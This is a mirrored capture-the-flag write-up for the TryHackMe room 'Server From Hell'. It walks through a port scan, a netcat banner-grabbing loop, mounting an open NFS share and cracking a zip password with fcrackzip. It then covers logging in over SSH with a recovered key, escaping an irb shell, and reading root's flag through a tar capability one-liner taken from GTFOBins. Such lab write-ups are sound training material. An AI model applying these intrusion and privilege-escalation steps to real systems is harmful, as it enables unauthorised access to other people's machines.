Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/Server_From_Hell.md
AbdullahRizwan101 f358a0616f
Add files via upload
2020-11-03 23:43:42 +05:00

161 lines
3.4 KiB
Markdown
Raw Blame History

# TryHackMe-Server From Hell
> Abdullah Rizwan | 05:54 PM | 3rd November ,2020
## NMAP
```
Not shown: 94 closed ports
PORT STATE SERVICE VERSION
1/tcp open tcpmux?
| fingerprint-strings:
| NULL:
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
3/tcp open compressnet?
| fingerprint-strings:
| NULL:
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
4/tcp open unknown
| fingerprint-strings:
| NULL:
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
6/tcp open unknown
........
There were many ports open in this box so can't really show how many ports were there
```
Looking at the description of the room it says about starting from `1337` ,so
## PORT 1337
`nc IP:1337`
```
Welcome traveller, to the beginning of your journey
To begin, find the trollface
Legend says he's hiding in the first 100 ports
Try printing the banners from the ports
```
This is the message we get when we connect to port 1337
I made a simple script to go over 100 ports and connect to it to grab banner
```
i=1
while [ $i -ne 100 ]
do
nc 10.10.173.96 $i
i=$(( $i + 1 ))
done
```
<img src="https://imgur.com/X2RBWne.png"/>
## PORT 12345
```
nc 10.10.173.96 12345
NFS shares are cool, especially when they are misconfigured
It's on the standard port, no need for another scan
```
## PORT 2049
The default port of `nfs` share is 2049 so lets see if there are any shares that we can mount on our local machine
<img src="https://imgur.com/ZsfnVwC.png"/>
Now let's mount that share
<img src="https://imgur.com/SDYKjPV.png"/>
We only find a `backup.zip`
<img src="https://imgur.com/VVLeFOp.png"/>
But it asks for a password
<img src="https://imgur.com/PdxqCba.png"/>
### Fcrackzip
Now lets use this to bruteforce archive's password
```
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip
PASSWORD FOUND!!!!: pw == zxcvbnm
```
<img src="https://imgur.com/mqLJMVD.png"/>
But I can't get to extract the files becasue `read-only file system` , so I used GUI to view what was in these files
<img src="https://imgur.com/0aJE2Xt.png"/>
And I was able to grab the flag,hint and ssh private key.
Now `hint.txt` says
```
2500-4500
```
I tried to ssh into the box using `hades` private but ssh port was not on 22
<img src="https://imgur.com/PfSORcz.png"/>
From the results of the scan I searched for ssh with openssh client
<img src="https://imgur.com/mgG3s7s.png"/>
And was logged in :D
<img src="https://imgur.com/2j3o2wy.png"/>
```
Welcome to hell. We hope you enjoy your stay!
irb(main):001:0> puts 'hello'
hello
=> nil
irb(main):002:0>
```
Now this `irb` is interactive ruby shell just like we get in python so in order to get a `/bin/bash` shell run
```
exec '/bin/bash'
```
<img src="https://imgur.com/TagPPFG.png"/>
## Privilege Escalation
Now the room gives us a hint about `getcap` this command tells that which file or binary has capability to access almost anything on the system so run
`getcap -r 2>/dev/null` (2>/dev/null ,here 2 just redirects Standard output error to null )
```
hades@hell:~$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep
```
Visiting `GTFOBINS`
https://gtfobins.github.io/gtfobins/tar/
```
hades@hell:~$ tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
thm{w0w_n1c3_3sc4l4t10n}
hades@hell:~$
```
Reference in a new issue View git blame Copy permalink